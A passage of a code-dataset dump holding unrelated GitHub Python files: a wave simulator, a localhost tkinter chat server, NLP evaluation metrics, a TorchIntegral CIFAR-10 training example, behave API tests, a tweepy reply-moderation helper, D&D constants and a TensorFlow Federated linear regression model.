autoAck=True)\nsk.loop()\n","repo_name":"stevenfoong/skype-rocketchat-bridge","sub_path":"rocketchat-bridge.py","file_name":"rocketchat-bridge.py","file_ext":"py","file_size_in_byte":11099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74301983800","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\nfrom Wave import Wave\nfrom WaveGraphBase import WaveGraphBase\n\nPI = np.pi\n\nsliderDataList = [{'name': 'Source amplitude', 'min': 0.1, 'max': 8.0, 'init': 2, 'step': 0.01},\n {'name': 'Source period', 'min': 0.1, 'max': 8 * PI, 'init': 2 * PI, 'step': 0.01},\n {'name': 'Left tension', 'min': 0.1, 'max': 8.0, 'init': 1, 'step': 0.01},\n {'name': 'Right tension', 'min': 0.1, 'max': 8.0, 'init': 2, 'step': 0.01},\n {'name': 'Left mass density', 'min': 0.1, 'max': 8.0, 'init': 1, 'step': 0.01},\n {'name': 'Right mass density', 'min': 0.1, 'max': 8.0, 'init': 0.5, 'step': 0.01},\n {'name': 'Simulation speed', 'min': 0.001, 'max': 2.0, 'init': 0.1, 'step': 0.001},\n {'name': 'Line thickness', 'min': 1, 'max': 10, 'init': 5, 'step': 0.1}]\n\ncheckboxDataList = [{'name': 'Source wave', 'init': True},\n {'name': 'Reflected wave', 'init': True},\n {'name': 'Transmitted wave', 'init': True},\n {'name': 'Source + reflected', 'init': False}]\n\nwaveList = [Wave(amplitude=2, period=2*PI, direction=1),\n None,\n None,\n None]\n\n\nclass WavesChangingMedium(WaveGraphBase):\n def __init__(self, name='Waves medium boundary', granularity=2048, x_range=4 * PI, x_offset=0, y_range=6, y_offset=0, time_factor=0.1, line_thickness=5, waves=[], slider_data=[], checkbox_data=[], tension=2, mass_density=0.5):\n super().__init__(name, granularity, x_range, x_offset, y_range, y_offset, time_factor, line_thickness, waves, slider_data, checkbox_data)\n self.tension = tension\n self.mass_density = mass_density\n\n def update(self, event=None):\n self.waves[0].amplitude = self.sliders[0].val\n self.waves[0].period = self.sliders[1].val\n self.waves[0].tension = self.sliders[2].val\n self.tension = self.sliders[3].val\n self.waves[0].mass_density = self.sliders[4].val\n self.mass_density = self.sliders[5].val\n self.time_factor = self.sliders[6].val\n self.line_thickness = self.sliders[7].val\n self.checkboxes_ticked = self.checkbox.get_status()\n\n def animate(self, i):\n self.waves[1] = self.waves[0].get_reflected_wave(self.tension, self.mass_density)\n self.waves[2] = self.waves[0].get_transmitted_wave(self.tension, self.mass_density)\n\n self.y_data[0] = self.waves[0].get_y_array(i * self.time_factor, self.x_data, static_show=[-self.x_range, 0])\n self.y_data[1] = self.waves[1].get_y_array(i * self.time_factor, self.x_data, static_show=[-self.x_range, 0])\n self.y_data[2] = self.waves[2].get_y_array(i * self.time_factor, self.x_data, static_show=[(-3*self.x_range-1)/self.granularity, self.x_range])\n self.y_data[3] = [x + y for x, y in zip(self.y_data[0], self.y_data[1])]\n\n for j in range(len(self.y_data)):\n if self.checkboxes_ticked[j]:\n plt.setp(self.lines[j], linewidth=self.line_thickness)\n else:\n plt.setp(self.lines[j], linewidth=0)\n\n self.lines[j].set_data(self.x_data, self.y_data[j])\n\n return self.patches\n\n\ngraph = WavesChangingMedium(waves=waveList, slider_data=sliderDataList, checkbox_data=checkboxDataList)\ngraph.start()\n","repo_name":"Karlovsky120/SimpleWaveSimulator","sub_path":"WaveMediumBoundary.py","file_name":"WaveMediumBoundary.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37328270057","text":"from tkinter import *\r\nfrom socket import *\r\nimport _thread\r\nimport threading\r\n\r\ndef initialize_server(portNum):\r\n global conn, addr, s, listenMsg\r\n conn =0\r\n addr = 0\r\n s = socket(AF_INET, SOCK_STREAM)\r\n host = 'localhost'\r\n port = portNum\r\n print(\"HEY IM IN INIT SERVER f{port}\")\r\n s.bind((host, port))\r\n s.listen(5)\r\n listenMsg.grid(row = 8, column= 0)\r\n listenMsg.place(x=150, y = 35)\r\n _thread.start_new_thread(handle, ())\r\n return conn\r\ndef handle():\r\n global conn,addr, successfulConnectionMsg, listenMsg\r\n while True:\r\n conn, addr = s.accept()\r\n successfulConnectionMsg.grid(row = 8, column= 0)\r\n successfulConnectionMsg.place(x=120, y = 56)\r\n listenMsg.after(1000, listenMsg.destroy) \r\n successfulConnectionMsg.after(2500, successfulConnectionMsg.destroy)\r\ndef update_chat(msg, state):\r\n global chatlog\r\n chatlog.config(state=NORMAL)\r\n if state==0:\r\n chatlog.insert(END, 'YOU: ' + msg)\r\n else:\r\n chatlog.insert(END, 'CLIENT: ' + msg)\r\n chatlog.config(state=DISABLED)\r\n chatlog.yview(END)\r\ndef checkPortNum(portNum):\r\n if(portNum == ''):\r\n return \"empty\"\r\n portNum = int(portNum)\r\n if(portNum > 65355 or portNum < 0):\r\n portNum=\"incorrectPortNum\"\r\n return portNum\r\ndef listen():\r\n global entry\r\n global errorMsgLabel\r\n global emptyErrorMsgLabel\r\n global conn\r\n global chatlog\r\n global emptyError\r\n global incorrectPortNum\r\n global emptyPortNum\r\n global successfulConnectionMsg \r\n emptyErrorMsgLabel.after(5000, emptyErrorMsgLabel.destroy)\r\n errorMsgLabel.after(5000, errorMsgLabel.destroy)\r\n userPortNum = entry.get()\r\n portNum = checkPortNum(userPortNum)\r\n if(portNum == \"empty\"):\r\n emptyErrorMsgLabel.grid(row = 8, column= 0)\r\n emptyErrorMsgLabel.place(x=80, y = 36)\r\n return \r\n if(portNum == \"incorrectPortNum\"):\r\n print(portNum)\r\n errorMsgLabel.grid(row = 8, column= 0)\r\n errorMsgLabel.place(x=70, y = 56)\r\n return\r\n print(\"BEFORE conn\")\r\n print(type(portNum))\r\n thread = threading.Thread(target = initialize_server(portNum))\r\n thread.start()\r\n print(\"AFter conn\")\r\ndef send(): \r\n global textbox\r\n global conn\r\n msg = textbox.get(\"0.0\", END)\r\n update_chat(msg, 0)\r\n conn.send(msg.encode('ascii'))\r\n textbox.delete(\"0.0\", END)\r\ndef receive():\r\n while 1:\r\n try:\r\n data = conn.recv(1024)\r\n msg = data.decode('ascii')\r\n if msg != \"\":\r\n update_chat(msg, 1)\r\n except:\r\n pass\r\ndef msgPress(event):\r\n send()\r\ndef listenPress(event):\r\n listen()\r\n\r\ndef GUI():\r\n global chatlog\r\n global textbox\r\n global entry\r\n global errorMsgLabel\r\n global incorrectPortNum\r\n global conn\r\n global emptyPortNum\r\n global emptyErrorMsgLabel\r\n global successfulConnectionMsg, listenMsg\r\n incorrectPortNum = False \r\n emptyPortNum = False\r\n gui = Tk()\r\n gui.title(\"Server Chat Box\")\r\n gui.geometry(\"980x430\")\r\n chatlog = Text(gui, bg='grey')\r\n chatlog.config(state=DISABLED)\r\n\r\n # buttons to send messages\r\n sendbutton = Button(gui, bg='grey', fg='white', text='SEND', command=send)\r\n listenBtn = Button(gui, bg='grey', fg= 'white', text='Listen', command=listen)\r\n portLabel = Label(gui, text=\"Port Number: \")\r\n errorMsgLabel = Label(gui, text=\"Incorrect Port Entered.\")\r\n emptyErrorMsgLabel = Label(gui, text=\"Port Not Entered. Try Again\")\r\n successfulConnectionMsg = Label(gui, text=\"Connection Built.\")\r\n listenMsg = Label(gui, text=\"Listening.\")\r\n entry = Entry(gui)\r\n textbox = Text(gui, bg='grey')\r\n portLabel.grid(row=6, column=0)\r\n portLabel.place(x=1, y=4)\r\n entry.grid(row = 6, column=0)\r\n listenBtn.grid(row = 6, column= 0)\r\n entry.place(x=80, y=6, height=20, width=800)\r\n listenBtn.place(x=900, y= 3)\r\n chatlog_y = 30\r\n chatlog.place(x=6, y=chatlog_y, height=356, width=965)\r\n textbox.place(x=6, y=401, height=20, width=865)\r\n sendbutton.place(x=900, y=401, height=20, width=50)\r\n textbox.bind(\"\", msgPress)\r\n listenBtn.bind(\"\", listenPress)\r\n _thread.start_new_thread(receive, ())\r\n gui.mainloop()\r\nif __name__ == '__main__':\r\n chatlog = textbox = None\r\n #conn = initialize_server(1234)\r\n GUI()","repo_name":"ZiyaanAli/ZiyaanAli_Chat_Messenger-CN","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39654447709","text":"import torch\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\ndef get_accuracy_bow(model,loader):\r\n y_preds = list()\r\n y_real = list()\r\n with torch.no_grad():\r\n for x, y in loader:\r\n y_preds.extend(model(x).argmax(dim=1).numpy().tolist())\r\n y_real.extend(y)\r\n return np.sum(np.array(y_preds)==y_real)/len(y_real),y_real,y_preds\r\n\r\ndef get_accuracy_bilstm(model,loader):\r\n y_preds = list()\r\n y_real = list()\r\n with torch.no_grad():\r\n for x, y, lengths in loader:\r\n y_preds.extend(model(x,lengths).argmax(dim=1).numpy().tolist())\r\n y_real.extend(y)\r\n return np.sum(np.array(y_preds)==y_real)/len(y_real),y_real,y_preds\r\n\r\ndef get_accuracy_test(model,model_type,x,y,lengths):\r\n with torch.no_grad():\r\n if model_type=='bow':\r\n y_preds = model(x).argmax(dim=1)\r\n return np.sum(y_preds.numpy()==y)/len(y),y_preds\r\n if model_type=='bilstm':\r\n y_preds = model(x,lengths).argmax(dim=1)\r\n return np.sum(y_preds.numpy()==y)/len(y),y_preds\r\n if model_type=='bow_bilstm':\r\n y_preds = model(x,lengths).argmax(dim=1)\r\n return np.sum(y_preds.numpy()==y)/len(y),y_preds\r\n\r\ndef get_accuracy_ens_bow(models,x,y):\r\n accs = list()\r\n y_preds_sum = list()\r\n for i in range(len(y)):\r\n y_preds_sum.append(dict())\r\n with torch.no_grad():\r\n for model_index in range(len(models)):\r\n y_preds = models[model_index](x).argmax(dim=1)\r\n accs.append(np.sum(y_preds.numpy()==y)/len(y))\r\n for i in range( len(y_preds.numpy().tolist()) ):\r\n if y_preds.numpy().tolist()[i] in y_preds_sum[i]:\r\n y_preds_sum[i][y_preds.numpy().tolist()[i]] += 1\r\n else:\r\n y_preds_sum[i][y_preds.numpy().tolist()[i]] = 1\r\n y_preds_ens = list()\r\n for i in range(len(y_preds_sum)):\r\n sort_list = list(y_preds_sum[i].items())\r\n sort_list.sort(key=lambda x:x[1],reverse=True)\r\n y_preds_ens.append(sort_list[0][0])\r\n accs.append( np.sum(np.array(y_preds_ens)==y)/len(y) )\r\n return accs,y_preds_ens\r\n\r\ndef get_accuracy_ens_bilstm(models,x,y,lengths):\r\n accs = list()\r\n y_preds_sum = list()\r\n for i in range(len(y)):\r\n y_preds_sum.append(dict())\r\n with torch.no_grad():\r\n for model_index in range(len(models)):\r\n y_preds = models[model_index](x,lengths).argmax(dim=1)\r\n accs.append(np.sum(y_preds.numpy()==y)/len(y))\r\n for i in range( len(y_preds.numpy().tolist()) ):\r\n if y_preds.numpy().tolist()[i] in y_preds_sum[i]:\r\n y_preds_sum[i][y_preds.numpy().tolist()[i]] += 1\r\n else:\r\n y_preds_sum[i][y_preds.numpy().tolist()[i]] = 1\r\n y_preds_ens = list()\r\n for i in range(len(y_preds_sum)):\r\n sort_list = list(y_preds_sum[i].items())\r\n sort_list.sort(key=lambda x:x[1],reverse=True)\r\n y_preds_ens.append(sort_list[0][0])\r\n accs.append( np.sum(np.array(y_preds_ens)==y)/len(y) )\r\n return accs,y_preds_ens\r\n\r\ndef get_confusion_matrix(y_real,y_preds,size):\r\n # Pandas settings\r\n pd.set_option('display.max_columns', None)\r\n pd.set_option('display.max_rows', None)\r\n pd.set_option('display.width', 100)\r\n pd.set_option('expand_frame_repr', False)\r\n pd.set_option('max_colwidth',100)\r\n mat = np.zeros( (size,size) , dtype=np.dtype(np.int32))\r\n for i in range(len(y_real)):\r\n if y_real[i]==y_preds[i]:\r\n mat[y_real[i]-1][y_real[i]-1] += 1\r\n else:\r\n mat[y_real[i]-1][y_preds[i]-1] += 1\r\n return pd.DataFrame(mat)\r\n\r\ndef get_micro_f1(conf_mat):\r\n mat = np.array(conf_mat)\r\n tp,fp,fn = list(),list(),list()\r\n for i in range(np.size(mat,0)):\r\n tp.append(mat[i][i])\r\n fp.append(np.sum(mat[:][i]) - mat[i][i] )\r\n fn.append(np.sum(mat[i][:]) - mat[i][i] )\r\n tp_sum = np.sum(np.array(tp))\r\n fp_sum = np.sum(np.array(fp))\r\n fn_sum = np.sum(np.array(fn))\r\n precision = tp_sum/(tp_sum+fp_sum)\r\n recall = tp_sum/(tp_sum+fn_sum)\r\n return 2*precision*recall/(precision+recall)\r\n\r\ndef get_macro_f1(conf_mat):\r\n mat = np.array(conf_mat)\r\n precision,recall = list(),list()\r\n f1 = list()\r\n for i in range(np.size(mat,0)):\r\n tp=mat[i][i]\r\n fp=np.sum(mat[:][i]) - mat[i][i]\r\n fn=np.sum(mat[i][:]) - mat[i][i]\r\n p,r=0,0\r\n if tp!=0 or fp!=0:\r\n p=tp/(tp+fp)\r\n precision.append(tp/(tp+fp))\r\n if tp!=0 or fn!=0:\r\n r=tp/(tp+fn)\r\n recall.append(tp/(tp+fn))\r\n if p!=0 or r!=0:\r\n f1.append(2*p*r/(p+r))\r\n else:\r\n f1.append(0)\r\n pre_avg = np.mean(np.array(precision))\r\n rec_avg = np.mean(np.array(recall))\r\n return 2*pre_avg*rec_avg/(pre_avg+rec_avg),f1","repo_name":"GenoZhang624/text-mining","sub_path":"Coursework1/src/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":4890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39977339079","text":"import torch\nimport torch.nn as nn\nimport torchvision\nimport torchvision.transforms as transforms\nfrom catalyst import dl\nfrom pytorchcv.model_provider import get_model\nimport os\nfrom torch_integral import IntegralWrapper, grid_tuning, TrainableGrid1D\n\n\ndef nin_cifar10(pretrained=True):\n net = get_model(\"nin_cifar10\", pretrained=pretrained)\n net.features.stage2.dropout2 = torch.nn.Identity()\n net.features.stage3.dropout3 = torch.nn.Identity()\n\n return net\n\n\n# DATA\nbatch_size = 128\n\naugmentation = transforms.Compose(\n [\n transforms.ToTensor(),\n transforms.RandomHorizontalFlip(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.247, 0.243, 0.261)),\n ]\n)\npreprocess = transforms.Compose(\n [\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.247, 0.243, 0.261)),\n ]\n)\n\nroot = os.path.expanduser(\"~\") + \"/datasets/\"\ntrain_dataset = torchvision.datasets.CIFAR10(\n root=root, train=True, download=True, transform=augmentation\n)\ntrain_dataloader = torch.utils.data.DataLoader(train_dataset, batch_size, shuffle=True)\n\nval_dataset = torchvision.datasets.CIFAR10(\n root=root, train=False, download=True, transform=preprocess\n)\nval_dataloader = torch.utils.data.DataLoader(val_dataset, batch_size, shuffle=False)\nloaders = {\"train\": train_dataloader, \"valid\": val_dataloader}\n\n# ------------------------------------------------------------------------------------\n# Model\n# ------------------------------------------------------------------------------------\nmodel = nin_cifar10().cuda()\ncontinuous_dims = {}\n\nfor name, mod in model.named_modules():\n if \"stage3\" in name:\n if not isinstance(mod, torch.nn.BatchNorm2d):\n if hasattr(mod, \"weight\"):\n continuous_dims[name + \".weight\"] = [0, 1]\n if hasattr(mod, \"bias\"):\n continuous_dims[name + \".bias\"] = [0]\n\nmodel = IntegralWrapper(\n init_from_discrete=True,\n fuse_bn=True,\n verbose=True,\n)(model, [1, 3, 32, 32], continuous_dims)\n\n# ------------------------------------------------------------------------------------\n# Train\n# ------------------------------------------------------------------------------------\ncross_entropy = nn.CrossEntropyLoss()\nlog_dir = \"./logs/cifar\"\nrunner = dl.SupervisedRunner(\n input_key=\"features\", output_key=\"logits\", target_key=\"targets\", loss_key=\"loss\"\n)\ncallbacks = [\n dl.AccuracyCallback(\n input_key=\"logits\", target_key=\"targets\", topk=(1,), num_classes=10\n ),\n dl.SchedulerCallback(mode=\"batch\", loader_key=\"train\", metric_key=\"loss\"),\n]\nloggers = []\nepochs = 10\n\nfor group in model.groups:\n if \"operator\" not in group.operations:\n n = group.size\n new_size = int(float(n) * 0.5)\n group.reset_grid(TrainableGrid1D(new_size))\n\nprint(\"compression: \", model.eval().calculate_compression())\n\nwith grid_tuning(model, False, True):\n opt = torch.optim.Adam(model.parameters(), lr=1e-3, weight_decay=0)\n epoch_len = len(train_dataloader)\n sched = torch.optim.lr_scheduler.MultiStepLR(\n opt, [epoch_len * 2, epoch_len * 5, epoch_len * 6, epoch_len * 8], gamma=0.33\n )\n runner.train(\n model=model,\n criterion=cross_entropy,\n optimizer=opt,\n scheduler=sched,\n loaders=loaders,\n num_epochs=epochs,\n callbacks=callbacks,\n loggers=loggers,\n logdir=log_dir,\n valid_loader=\"valid\",\n valid_metric=\"loss\",\n verbose=True,\n )\n\n# ------------------------------------------------------------------------------------\n# Eval\n# ------------------------------------------------------------------------------------\nmetrics = runner.evaluate_loader(\n model=model, loader=loaders[\"valid\"], callbacks=callbacks[:1]\n)\n","repo_name":"TheStageAI/TorchIntegral","sub_path":"examples/classification/nin_cifar.py","file_name":"nin_cifar.py","file_ext":"py","file_size_in_byte":3790,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"40"} +{"seq_id":"30253155952","text":"puisi = open(\"Puisi.txt\",\"r\")\nread_method1 = puisi.readlines() # read and return list\nread_method2 = puisi.read() # read and return string\nfor text in read_method1:\n print(text)\npuisi.close()\n\n# # write files\n# name = input(\"Name -> \")\n# age = input(\"Age -> \")\n# address = input(\"address -> \")\n# # format\n# teks = \"Name => {}\\nAge => {}\\nAddress => {}\".format(name,age,address)\n# teks2 = [\"sapi\",\"udang\",\"Sapi\",\"kerbau\"]\n# # open\n# file_bio = open(\"biodata.txt\",\"w\")\n# file_bio2 = open(\"biodata2.txt\",\"w\")\n# # write\n# file_bio.write(teks) # all str\n# file_bio.writelines(teks2) # list\n# file_bio2.close()\n# file_bio.close()\n","repo_name":"SemmiDev/Python-Basic","sub_path":"petanikode/files/FileReaderAndWriter/App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13625179037","text":"from behave import *\nimport os\nimport requests\nimport signal\nimport time\nimport json\n\n# service expose according to http://192.168.49.2:32248/gatito\n@given('a valid user is logged in for gatito')\ndef step_impl(context):\n pass\n\n@when('the user sends a get request for gatito')\ndef step_impl(context):\n print(\"checking API /gatito\")\n context.url = 'http://192.168.49.2:32248/gatito'\n context.headers = {'content-type': 'application/json'}\n context.response = requests.get(context.url) \n print(context.response) # This is the response status code \n print(context.response.content.decode('utf8')) # This is the body response code \n print()\n assert True is not False\n # might check if there is a valid response assert context.response.status_code is not null \n\n@Then('the user obtains a 200 OK for gatito')\ndef step_impl(context):\n print(\"checking response status code\")\n # if the response code is not 200 we are failing the step\n assert context.response.status_code == 200, \"Response code is different: %s\" % context.response.status_code + \" Error: \" + str(context.response.content)\n\n@Then('the user obtains miau')\ndef step_impl(context):\n print('checking response body de gatito')\n body = context.response.content.decode('utf8') # get the body \n data = json.loads(body) # get the json format for the body \n print(body)\n print(data)\n print(data['gatito']) # print the value of the element gatito \n # if gatito does have miau miau! as a response the scenario fails\n assert data['gatito'] == 'miau miau!', \"code is different: %s\" % context.response.content + \" Error: \" + str(context.response.content)\n\n","repo_name":"robertolegido/DEMO_PYTHON_FLASK","sub_path":"AUTO/features/steps/gatito_steps.py","file_name":"gatito_steps.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"45881012225","text":"import config as cfg\nimport tweepy\n\n\ndef config_setup():\n return TwitterObj(cfg.BEARER_TOKEN,cfg.CONSUMER_API_KEY,\n cfg.CONSUMER_API_KEY_SECRET,cfg.ACCESS_TOKEN,cfg.ACCESS_TOKEN_SECRET)\n\nclass TwitterObj:\n def __init__(self,bearer_token,\n consumer_key,consumer_secret,\n acces_token,acces_token_secret):\n self._bearer_token = bearer_token\n self._consumer_key = consumer_key\n self._consumer_key_secret = consumer_secret\n self._access_token = acces_token\n self._access_token_secret = acces_token_secret\n\n def create_twitter_obj(self):\n self._client = tweepy.Client(bearer_token=self._bearer_token,\n consumer_key=self._consumer_key, consumer_secret=self._consumer_key_secret,\n access_token=self._access_token,access_token_secret=self._access_token_secret)\n\n self._auth = tweepy.OAuth1UserHandler(\n consumer_key=self._consumer_key, consumer_secret=self._consumer_key_secret,\n access_token=self._access_token,access_token_secret=self._access_token_secret)\n\n self._api = tweepy.API(auth=self._auth) \n\n def find_user_tweets(self,name,count = 100):\n tweets = self._api.user_timeline(screen_name=name, \n count=count+2,\n include_rts = False,\n tweet_mode = 'extended'\n )\n return tweets\n \n def find_replies(self,tweet_id,items):\n replies=[]\n for tweet in tweepy.Cursor(self._api.search_tweets,q='to:'+self.username).items(items):\n if hasattr(tweet, 'in_reply_to_status_id_str'):\n if (tweet.in_reply_to_status_id_str==tweet_id):\n replies.append(tweet)\n if(not replies): return None\n return replies\n\n def disable_eveything_from_user(self,reply_id,user_id):\n self._client.block(user_id)\n self._client.mute(user_id)\n self._client.hide_reply(reply_id)\n \n def set_username(self,username):\n self.username = username\n\n \n\n\n\n\n# # client.delete_tweet(id=1550908991513006083)\n# # client.mute()\n# # client.hide_reply(id=1549745844638949376)\n# test.client.block()\n# test.client.hide_reply()\n# test.client.mute()\n\n","repo_name":"Jakaroo17/twitter-filter","sub_path":"twitter_part.py","file_name":"twitter_part.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6294579398","text":"#from math import pow\n#while True:\n# broj = input(\"Unesite duljinu brida kocke ili q za izlaz: \")\n# if broj == \"q\":\n# break\n# else:\n# rezultat = pow(float(broj), 3)\n# print(\"Rezultat je \" + str(rezultat))\n\n\n#Napišite program koji će unositi dva imena te će od njih napraviti novo ime koristeći prva tri\n# slova prvog i zadnja tri slova drugog unesenog imena.\n#Primjer:\n#Ulaz:\n#Marina\n#Darija\n#Izlaz:\n#Marija\n\n\nprvo_ime = input(\"\")\ndrugo_ime = input(\"\")\nrezultat = prvo_ime[0:3] + drugo_ime[-3:]\nprint(rezultat)\n\n\n\n#s = {1,2,3,4,5}\n#print(\"{}\".format(s[0]))\n\n#print(\"{}\".format({1,2,3} & {3,4,5}))\n\n\n\n","repo_name":"zeidombo/courses","sub_path":"Other/School/rasprava.py","file_name":"rasprava.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"hr","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13264807876","text":"# Character Traits\nSTR = \"Strength\"\nDEX = \"Dexterity\"\nCON = \"Constitution\"\nINT = \"Intelligence\"\nWIS = \"Wisdom\"\nCHA = \"Charisma\"\n\nskillTypes = [STR, DEX, CON, INT, WIS, CHA]\n\nSPD = \"Speed\"\nAC = \"Armor Class\"\n\nPROF = \"Proficiencies\"\nABIL = \"Abilities\"\n\n# Skills\nACROBATICS = \"Acrobatics\"\nANIMAL_HANDLING = \"Animal Handling\"\nARCANA = \"Arcana\"\nATHLETICS = \"Athletics\"\nDECEPTION = \"Deception\"\nHISTORY = \"History\"\nINSIGHT = \"Insight\"\nINTIMIDATION = \"Intimidation\"\nINVESTIGATION = \"Investigation\"\nMEDICINE = \"Medicine\"\nNATURE = \"Nature\"\nPERCEPTION = \"Perception\"\nPERFORMANCE = \"Performance\"\nPERSUASION = \"Persuasion\"\nRELIGION = \"Religion\"\nSLIGHT_OF_HAND = \"Slight of Hand\"\nSTEALTH = \"Stealth\"\nSURVIVAL = \"Survival\"\n\n\n# Classes\nFIGHTER = \"Fighter\"\n\n\n# Race Traits\nSML = \"Small\"\nMED = \"Medium\"\nLRG = \"Large\"\n\nraceSizes = [SML, MED, LRG]\n\n# Races\nHUMAN = \"Human\"\nELF = \"ELF\"\n\n# Languages\nCMN = \"Common\"\n\n# Definitions\nCANTRIP = \"Cantrip\"\n\n# Item types\nARMOR = \"Armor\"\nSHIELD = \"Shield\"\nWEAPON = \"Weapon\"\nSIMPLE = \"Simple\"\nMARTIAL = \"Martial\"\nMELEE = \"Melee\"\nRANGED = \"Ranged\"\nEQUIPMENT = \"Equipment\"\nLIGHT = \"Light\"\nMEDIUM = \"Medium\"\nHEAVY = \"Heavy\"\n\nitemTypes = [ARMOR, SHIELD, WEAPON, SIMPLE, MARTIAL, MELEE, RANGED, EQUIPMENT, LIGHT, MEDIUM, HEAVY]\n","repo_name":"dantan2000/DND_Discord_Bot","sub_path":"python/Types.py","file_name":"Types.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2433143587","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport collections\nimport functools\n\nimport tensorflow as tf\n\nfrom tensorflow_federated.python import core as tff\nfrom tensorflow_federated.python.learning import model\n\n\nclass LinearRegression(model.Model):\n \"\"\"Example of a simple linear regression implemented directly.\"\"\"\n\n # A tuple (x, y), where 'x' represent features, and 'y' represent labels.\n Batch = collections.namedtuple('Batch', ['x', 'y']) # pylint: disable=invalid-name\n\n def __init__(self, feature_dim=2):\n # Define all the variables, similar to what Keras Layers and Models\n # do in build().\n self._feature_dim = feature_dim\n # TODO(b/124070381): Support for integers in num_examples, etc., is handled\n # here in learning, by adding an explicit cast to a float where necessary in\n # order to pass typechecking in the reference executor.\n self._num_examples = tf.Variable(0, name='num_examples', trainable=False)\n self._num_batches = tf.Variable(0, name='num_batches', trainable=False)\n self._loss_sum = tf.Variable(0.0, name='loss_sum', trainable=False)\n self._a = tf.Variable(\n # N.B. The lambda is needed for use in defuns, see ValueError\n # raised from resource_variable_ops.py.\n lambda: tf.zeros(shape=(feature_dim, 1)),\n name='a',\n trainable=True)\n self._b = tf.Variable(0.0, name='b', trainable=True)\n # Define a non-trainable model variable (another bias term)\n # for code coverage in testing.\n self._c = tf.Variable(0.0, name='c', trainable=False)\n self._input_spec = LinearRegression.make_batch(\n x=tf.TensorSpec([None, self._feature_dim], tf.float32),\n y=tf.TensorSpec([None, 1.0], tf.float32))\n\n @property\n def trainable_variables(self):\n return [self._a, self._b]\n\n @property\n def non_trainable_variables(self):\n return [self._c]\n\n @property\n def local_variables(self):\n return [self._num_examples, self._num_batches, self._loss_sum]\n\n @property\n def input_spec(self):\n # Model expects batched input, but the batch dimension is unspecified.\n return self._input_spec\n\n @tf.contrib.eager.defun(autograph=False)\n def _predict(self, x):\n return tf.matmul(x, self._a) + self._b + self._c\n\n @tf.contrib.eager.defun(autograph=False)\n def forward_pass(self, batch, training=True):\n del training # Unused\n if isinstance(batch, dict):\n batch = self.make_batch(**batch)\n if not self._input_spec.y.is_compatible_with(batch.y):\n raise ValueError('Expected batch.y to be compatible with '\n '{} but found {}'.format(self._input_spec.y, batch.y))\n if not self._input_spec.x.is_compatible_with(batch.x):\n raise ValueError('Expected batch.x to be compatible with '\n '{} but found {}'.format(self._input_spec.x, batch.x))\n predictions = self._predict(batch.x)\n residuals = predictions - batch.y\n num_examples = tf.gather(tf.shape(predictions), 0)\n total_loss = 0.5 * tf.reduce_sum(tf.pow(residuals, 2))\n\n tf.assign_add(self._loss_sum, total_loss)\n tf.assign_add(self._num_examples, num_examples)\n tf.assign_add(self._num_batches, 1)\n\n average_loss = total_loss / tf.cast(num_examples, tf.float32)\n return model.BatchOutput(loss=average_loss, predictions=predictions)\n\n @tf.contrib.eager.defun(autograph=False)\n def report_local_outputs(self):\n return collections.OrderedDict([\n ('num_examples', self._num_examples),\n ('num_examples_float', tf.cast(self._num_examples, tf.float32)),\n ('num_batches', self._num_batches),\n ('loss', self._loss_sum / tf.cast(self._num_examples, tf.float32)),\n ])\n\n @property\n def federated_output_computation(self):\n\n @tff.federated_computation\n def fed_output(local_outputs):\n # TODO(b/124070381): Remove need for using num_examples_float here.\n return {\n 'num_examples':\n tff.federated_sum(local_outputs.num_examples),\n 'loss':\n tff.federated_mean(\n local_outputs.loss, weight=local_outputs.num_examples_float),\n }\n\n return fed_output\n\n @classmethod\n def make_batch(cls, x, y):\n \"\"\"Returns a `Batch` to pass to the forward pass.\"\"\"\n return cls.Batch(x, y)\n\n\nclass TrainableLinearRegression(LinearRegression, model.TrainableModel):\n \"\"\"A LinearRegression with trivial SGD training.\"\"\"\n\n @tf.contrib.eager.defun(autograph=False)\n def train_on_batch(self, batch):\n # Most users won't implement this, and let us provide the optimizer.\n fp = self.forward_pass(batch)\n optimizer = tf.train.GradientDescentOptimizer(0.1)\n optimizer.minimize(fp.loss, var_list=self.trainable_variables)\n return fp\n\n\ndef _dense_all_zeros_layer(input_dims=None, output_dim=1):\n \"\"\"Create a layer that can be used in isolation for linear regression.\n\n Constructs a Keras dense layer with a single output, using biases and weights\n that are initialized to zero. No activation function is applied. When this is\n the only layer in a model, the model is effectively a linear regression model.\n\n Args:\n input_dims: the integer length of the input to this layers. Maybe None if\n the layer input size does not need to be specified.\n output_dim: the integer length of the flattened output tensor. Defaults to\n one, effectively making the layer perform linear regression.\n\n Returns:\n a `tf.keras.layers.Dense` object.\n \"\"\"\n build_keras_dense_layer = functools.partial(\n tf.keras.layers.Dense,\n units=output_dim,\n use_bias=True,\n kernel_initializer='zeros',\n bias_initializer='zeros',\n activation=None)\n if input_dims is not None:\n return build_keras_dense_layer(input_shape=(input_dims,))\n return build_keras_dense_layer()\n\n\ndef 